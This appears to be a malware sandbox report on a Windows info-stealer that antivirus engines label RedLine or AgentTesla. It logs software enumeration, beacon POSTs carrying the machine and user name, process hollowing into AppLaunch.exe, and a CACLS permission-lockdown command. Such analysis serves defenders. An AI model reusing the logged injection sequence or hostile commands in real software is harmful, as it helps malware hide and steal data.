regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0
process AppLaunch.exe useragent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
process explothe.exe useragent
process iexplore.exe useragent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Process injection Process 2820 called NtSetContextThread to modify thread in remote process 2908
Process injection Process 2516 called NtSetContextThread to modify thread in remote process 2680
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3996568
registers.edi: 0
registers.eax: 4198977
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 2908
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3013372
registers.edi: 0
registers.eax: 4384798
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 2680
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0
Process injection Process 2820 resumed a thread in remote process 2908
Process injection Process 2516 resumed a thread in remote process 2680
Process injection Process 232 resumed a thread in remote process 776
Process injection Process 1356 resumed a thread in remote process 2708
Process injection Process 1356 resumed a thread in remote process 2276
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000114
suspend_count: 1
process_identifier: 2908
1 0 0

NtResumeThread

thread_handle: 0x00000114
suspend_count: 1
process_identifier: 2680
1 0 0

NtResumeThread

thread_handle: 0x00000264
suspend_count: 1
process_identifier: 776
1 0 0

NtResumeThread

thread_handle: 0x00000388
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

thread_handle: 0x0000057c
suspend_count: 1
process_identifier: 2276
1 0 0
cmdline cmd /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline CACLS "..\fefffe8cea" /P "test22:R" /E
cmdline CACLS "explothe.exe" /P "test22:N"
cmdline CACLS "..\fefffe8cea" /P "test22:N"
cmdline CACLS "explothe.exe" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2604
thread_handle: 0x0000001c
process_identifier: 2600
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sw8Ll4hQ.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

thread_identifier: 452
thread_handle: 0x00000124
process_identifier: 232
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2672
thread_handle: 0x0000001c
process_identifier: 2668
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\CL7mg6kK.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

thread_identifier: 2744
thread_handle: 0x00000124
process_identifier: 2740
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5QZ57Cm.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2728
thread_handle: 0x0000001c
process_identifier: 2724
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\Xf6FM0Om.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

thread_identifier: 2508
thread_handle: 0x00000124
process_identifier: 2516
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\4xZ332Qr.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2780
thread_handle: 0x0000001c
process_identifier: 2776
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\xu7aE2xu.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

thread_identifier: 2264
thread_handle: 0x00000124
process_identifier: 2260
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3Fy8If55.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2824
thread_handle: 0x0000001c
process_identifier: 2820
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP004.TMP\1Xf30uE8.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

thread_identifier: 2972
thread_handle: 0x00000124
process_identifier: 2968
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2LJ507bv.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2912
thread_handle: 0x00000114
process_identifier: 2908
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000118
1 1 0

NtGetContextThread

thread_handle: 0x00000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2908
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $àž ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhX‚ÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°€dX´ÿmY°€’Y¥ÿmY°€oX¥ÿmYRich¤ÿmYPELÖT5eà $*¸A@@ @L›(ààðÐ/à @@.text)* `.rdataxa@b.@@.datah#°@À.rsrcààž@@.relocÐ/ð0 @B
base_address: 0x00400000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00424000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ “ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þˆZB@¶B@¶B@¶B@¶B@¶BH¶B]Bˆ^BÈTB€µB`°BC˜¶BHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBœ¶BLÇBLÇBLÇBLÇBLÇBLÇBLÇB..þÿÿÿ   þÿÿÿu˜ŠÐù¾cyåú¦eÍiL’Ś?þDVƒÐü!ŠÊû‰×6}¼™$Áªaк;ëZèy©Ä*@éã¶úæô€;Ž;¥¹Ò3[ 1œà©Üށ—Ù#,s—s3WILȽy+  qPøkú¢¼ÇmµúÂÆâs5†}àO£td€ïˆôfGj}Ɂ¬:ø÷¹â&÷c&ÀǙ@z‘ÞcÅgÓÑëGïNn3g“ ‰|ÔZز¤G> bŠ&}LºF‰w‹XÍ|[x¦D@q#4m$>äÂö>/ö8Iå¸7МGñD¨íòDñ¥Ñ&\qÀÒJ²Z $\ÒVi×´v8·´ˆÆ &À‡ÿ>̐<[ÏlEfMdý|îoK¡JnÜnÔϯ ïµÃFòÜxAayÛO†w(ì³Ö-ÆÆõA5«V¥0½REA“ãýñbG-¨¦¥ [Êþdã0[okû€hn¤ÛB ±±!S^¥4\Áéj8ªJÛ®!2ɘ€)C…¨”ñgÕ{@ÜMZ¶ß?…þŒ÷‘}M¯­„,ëï—õ*ž Û³OS*÷=B˜9Àc\#ŒÃ\9§ 0b;–(Ïÿ©(ÎZ﨏™ðšóe^4>ØxšúI"WÂB°%/힯¼áy?Ó( —ÖüM݋ð·7¢ —–…L{éü=ž·Ë¡gǃmPvl|S╏ DÄêq¯”o“ùŽ¾„Ì •!sœì©M7<wòÂ,-•–€<L1Ò ¿ü†/’˜w̓ð¹DPÐò°=þoʟÐðҌ¶eÆzoaªd>aùr)0Þ sÉzdÎD8@¸Þ¿åK@X›¥³jj&å™"Šª¯L¤E©ÊæpÏ_éKr¢•O‰Ý›TmªƒÛªuZE)J2^D{ðR¤%•£‚§õ…¼wX…˜"Æ®ë"~"ê<äPu¶ç˜„5G‚}¹‰~ó³œPr<LÌu ítuuDæ…Ôúä„fÂî4Ñ@#j-ÂÒ£ ÑɺgÍZê·í2>[Ììg€u‚„½C*PHçëhºö-€áN($q$ãeË°þm*â˜k3²Jd‰¼I?Ó#J€0ÊD’êQâZb&'ԋ ¦g¡Æ^_/|ŽB.?AVbad_exception@std@@|ŽB.?AVexception@std@@|ŽB.?AVtype_info@@
base_address: 0x0042b000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: €0€ H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0042e000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0042f000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2908
process_handle: 0x00000118
1 1 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 3996568
registers.edi: 0
registers.eax: 4198977
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 2908
1 0 0

NtResumeThread

thread_handle: 0x00000114
suspend_count: 1
process_identifier: 2908
1 0 0

NtResumeThread

thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000238
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000278
suspend_count: 1
process_identifier: 2968
1 0 0

NtGetContextThread

thread_handle: 0x00000188
1 0 0

NtGetContextThread

thread_handle: 0x00000188
1 0 0

NtResumeThread

thread_handle: 0x00000188
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000368
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000003a0
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000430
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000454
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x0000046c
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000488
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000004a0
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000004b8
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000004d0
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000004e8
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000504
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000510
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x00000568
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

thread_handle: 0x000005ec
suspend_count: 1
process_identifier: 2968
1 0 0

CreateProcessInternalW

thread_identifier: 2700
thread_handle: 0x00000114
process_identifier: 2680
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000118
1 1 0

NtGetContextThread

thread_handle: 0x00000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 253952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELïd‚Æà 0ʬè @ à@…ÈçSV©À  H.text$È Ê `.rsrcV©ªÌ@@.reloc Àv@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00430000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: à 8
base_address: 0x0043c000
process_identifier: 2680
process_handle: 0x00000118
1 1 0
Bkav W32.AIDetectMalware
Cynet Malicious (score: 100)
CAT-QuickHeal Trojan.GenericRI.S31067593
Skyhigh BehavesLike.Win32.AgentTesla.tc
McAfee Trojan-FVTT!1E399FD52E22
VIPRE IL:Trojan.MSILMamut.12798
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 0051918e1 )
K7GW Trojan ( 0051918e1 )
Cybereason malicious.c01062
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 multiple detections
APEX Malicious
ClamAV Win.Packed.Disabler-10009777-0
Kaspersky HEUR:Trojan.Win32.Injuke.gen
NANO-Antivirus Trojan.Win32.Deyma.kbnced
SUPERAntiSpyware Trojan.Agent/Gen-Downloader
MicroWorld-eScan IL:Trojan.MSILMamut.12798
Avast Win32:Evo-gen [Trj]
Rising Trojan.Generic@AI.100 (RDML:otSXu4PIY2MTANgPLQ7YdQ)
F-Secure Trojan.TR/Spy.Gen
DrWeb Trojan.PWS.RedLineNET.9
TrendMicro TrojanSpy.Win32.REDLINE.YXDJWZ
Trapmine malicious.high.ml.score
Sophos Generic ML PUA (PUA)
SentinelOne Static AI - Malicious SFX
GData Win32.Trojan.PSE.1N3O6MD
